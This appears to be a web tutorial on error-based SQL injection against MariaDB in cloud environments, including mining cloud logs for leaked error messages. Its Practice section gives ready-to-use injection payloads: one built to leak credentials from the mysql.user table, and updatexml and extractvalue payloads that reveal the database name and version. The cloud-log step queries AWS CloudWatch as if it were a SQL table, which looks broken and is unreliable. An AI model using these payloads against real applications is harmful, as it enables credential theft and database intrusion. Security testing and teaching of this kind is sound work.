Error-Based Attacks in Cloud

Context

This article explores how to perform error-based SQL injection attacks in MariaDB within cloud environments. The primary goal is to illustrate the techniques for extracting sensitive data using database error messages in the cloud, assuming knowledge in cloud infrastructure, SQL error handling, cloud logging mechanisms, and previous experience with MariaDB SQL injection.

Theory

Error Message Leak in Cloud Environments

Error-based SQL injection is a technique that exploits the messages returned by a database to extract data. In cloud environments, such error messages could inadvertently be exposed in logs, providing valuable information to an attacker. The key to this approach is injecting SQL payloads designed to trigger errors and subsequently examining these error messages to gather data.

Attack Sequence

  1. Inject a carefully crafted SQL payload.
  2. Trigger database errors that concatenate or display internal data.
  3. Capture and examine the error messages to extract useful information.

Cloud Logs Exfiltration

Cloud logging services, such as AWS CloudWatch, often store detailed logs of error messages. These logs can contain sensitive data when database errors occur. An important attack method involves accessing these logs to retrieve any data leaks that have been inadvertently stored.

Data Flow

  • User interacts with the web application.
  • The application triggers an SQL error.
  • The error message gets logged by the cloud service.
  • The attacker retrieves these logs to extract sensitive information.

Attack Sequence

  1. Trigger SQL errors to generate detailed error messages.
  2. Access cloud-based logs where these messages are stored.
  3. Analyze the logs for sensitive information leakage.

MariaDB Error Handling in Cloud

MariaDB's error handling might not always sanitize the error messages correctly, leading to potential data leaks. Such SQL errors can reveal parts of the database structure, including table names, column names, and even data stored within.

Cloud Logging Vulnerabilities

Cloud logging services often assume their logs are secure and inaccessible to unauthorized users. However, if these logs are misconfigured or improperly secured, they can become a vector for information disclosure attacks. The potential exposure of sensitive data in cloud logs represents a significant vulnerability.

Practice

Exploiting Error-Based SQL Injection in MariaDB on Cloud

  1. Triggering User Credentials Leak

    • Inject the following SQL payload into an application input:
    SELECT * FROM users WHERE id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(user,0x7e,password) FROM mysql.user LIMIT 0,1)),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a);
    • This payload triggers an error designed to leak the user credentials from the 'mysql.user' table.

  2. Extracting Database Name

    • Use updatexml function to cause an error:
    SELECT updatexml(null,concat(0x3a,(SELECT database())),null);
    • The database name is revealed through the error message caused by this injection.

  3. Extracting Database Version

    • Use extractvalue function:
    SELECT extractvalue(rand(),concat(0x3a,(SELECT version())));
    • This payload causes a database error that reveals the database version.

  4. Searching for Leaked Data in Cloud Logs

    • Access the cloud logs and search for error messages containing leaked data:
    SELECT * FROM cloudwatch_logs WHERE message LIKE '%error%';
    • Review the stored error messages for any sensitive information that has been logged.

These steps can lead to the extraction of sensitive data from error messages that are logged in cloud environments, demonstrating how an attacker can exploit inadequate error handling and logging practices.

Tools

  • SQLMap
  • Burp Suite
  • AWS CloudWatch

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.